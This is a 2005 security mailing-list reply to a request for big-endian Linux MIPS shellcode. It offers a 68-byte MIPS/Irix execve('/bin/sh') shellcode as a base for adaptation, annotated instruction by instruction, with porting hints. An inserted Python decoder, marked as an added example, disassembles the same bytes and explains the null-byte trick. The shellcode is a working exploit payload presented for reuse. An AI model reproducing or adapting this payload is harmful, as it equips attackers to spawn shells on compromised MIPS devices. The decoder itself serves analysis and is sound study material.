Re: Linux MIPS shellcode (Big Endian)
You could base it off of this. Looks big-endian to me, based on my somewhat limited knowledge of MIPS architecture.

/* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso */
unsigned char shellcode[] =
    "\xaf\xa0\xff\xfc" /* sw $zero, -4($sp) */
    "\x24\x06\x73\x50" /* li $a2, 0x7350 */
    "\x04\xd0\xff\xff" /* bltzal $a2, dpatch */
    "\x8f\xa6\xff\xfc" /* lw $a2, -4($sp) */

    /* a2 = (char **) envp = NULL */
    "\x24\x0f\xff\xcb" /* li $t7, -53 */
    "\x01\xe0\x78\x27" /* nor $t7, $t7, $zero */
    "\x03\xef\xf8\x21" /* addu $ra, $ra, $t7 */

    /* a0 = (char *) pathname */
    "\x23\xe4\xff\xf8" /* addi $a0, $ra, -8 */

    /* fix 0x42 dummy byte in pathname to shell */
    "\x8f\xed\xff\xfc" /* lw $t5, -4($ra) */
    "\x25\xad\xff\xbe" /* addiu $t5, $t5, -66 */
    "\xaf\xed\xff\xfc" /* sw $t5, -4($ra) */

    /* a1 = (char **) argv */
    "\xaf\xa4\xff\xf8" /* sw $a0, -8($sp) */
    "\x27\xa5\xff\xf8" /* addiu $a1, $sp, -8 */

    "\x24\x02\x04\x23" /* li $v0, 1059 (SYS_execve) */
    "\x01\x01\x01\x0c" /* syscall */
    "\x2f\x62\x69\x6e" /* .ascii "/bin" */
    "\x2f\x73\x68\x42"; /* .ascii "/sh", .byte 0x42 (dummy) */


If you compiled a C program like this for linux-mips:

#include <unistd.h>

int main(void)
{
	execve("/bin/sh", NULL, NULL);
	return 0;
}

You should be able to see what's going on.

I'd imagine that the Linux syscall wants you to put arguments in $a0, $a1, etc., and the syscall number in $v0. This is how the MIPS calling conventions are, I think, so I would imagine Linux respects them. It might be as simple as changing the syscall number.
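Added example, not part of the original reply or of the teso code: a minimal decoder for the handful of MIPS instruction forms the listing above uses. Decoding each 4-byte word under both byte orders shows that only the big-endian reading reproduces the mnemonics in the listing (the two trailing words are the "/bin/sh" data and decode to nothing), and the same bytes show how the addiu -66 fix-up turns the 0x42 dummy byte into the NUL terminator. The byte string is a constructed copy of the 17 words quoted above.

```python
import struct

# Constructed copy of the 17 instruction words quoted in the reply above.
SHELLCODE = (
    b"\xaf\xa0\xff\xfc\x24\x06\x73\x50\x04\xd0\xff\xff\x8f\xa6\xff\xfc"
    b"\x24\x0f\xff\xcb\x01\xe0\x78\x27\x03\xef\xf8\x21\x23\xe4\xff\xf8"
    b"\x8f\xed\xff\xfc\x25\xad\xff\xbe\xaf\xed\xff\xfc\xaf\xa4\xff\xf8"
    b"\x27\xa5\xff\xf8\x24\x02\x04\x23\x01\x01\x01\x0c\x2f\x62\x69\x6e"
    b"\x2f\x73\x68\x42"
)

# o32 register names, indexed by the 5-bit register field.
REGS = ("zero at v0 v1 a0 a1 a2 a3 t0 t1 t2 t3 t4 t5 t6 t7 "
        "s0 s1 s2 s3 s4 s5 s6 s7 t8 t9 k0 k1 gp sp fp ra").split()
ARITH = {0x08: "addi", 0x09: "addiu"}   # I-type, register operands
MEM = {0x23: "lw", 0x2b: "sw"}          # I-type, offset(base) operands
R_FUNCT = {0x0c: "syscall", 0x21: "addu", 0x27: "nor"}

def decode(word):
    """Decode one 32-bit MIPS word into the mnemonic used in the listing, or None for data."""
    op, rs, rt = word >> 26, (word >> 21) & 31, (word >> 16) & 31
    imm = word & 0xffff
    simm = imm - 0x10000 if imm & 0x8000 else imm     # sign-extend the 16-bit immediate
    if op == 0:                                        # R-type: funct field selects the operation
        rd, name = (word >> 11) & 31, R_FUNCT.get(word & 0x3f)
        if name == "syscall":
            return "syscall"
        return f"{name} ${REGS[rd]}, ${REGS[rs]}, ${REGS[rt]}" if name else None
    if op == 1 and rt == 0x10:                         # REGIMM: bltzal rs, offset
        return f"bltzal ${REGS[rs]}, {simm}"
    if op in ARITH:
        if rs == 0:                                    # addiu rt, $zero, imm is the 'li' idiom
            return f"li ${REGS[rt]}, {simm}"
        return f"{ARITH[op]} ${REGS[rt]}, ${REGS[rs]}, {simm}"
    if op in MEM:
        return f"{MEM[op]} ${REGS[rt]}, {simm}(${REGS[rs]})"
    return None

def disassemble(code, endian="big"):
    """Decode every 4-byte word of code under the given byte order ('big' or 'little')."""
    fmt = ">I" if endian == "big" else "<I"
    return [decode(struct.unpack(fmt, code[i:i + 4])[0]) for i in range(0, len(code), 4)]

def patched_path(code):
    """Apply the 'addiu $t5, $t5, -66' fix-up to the last word: 0x42 becomes the NUL terminator."""
    last = struct.unpack(">I", code[-4:])[0]
    return code[-8:-4] + struct.pack(">I", (last - 66) & 0xffffffff)

if __name__ == "__main__":
    for endian in ("big", "little"):
        print(endian, disassemble(SHELLCODE, endian))
    print(patched_path(SHELLCODE))
```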

On Dec 15, 2005, at 6:04 PM, Roman Medina-Heigl Hernandez wrote:

Hi,

Does somebody have shellcode for linux-mips (MSB)?

I found this for LSB (Little Endian) Cobalt:
http://www.milw0rm.com/id.php?id=1306

I'd like to play with Broadcom chipset and MSB (Big Endian)...

--

Saludos,
-Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]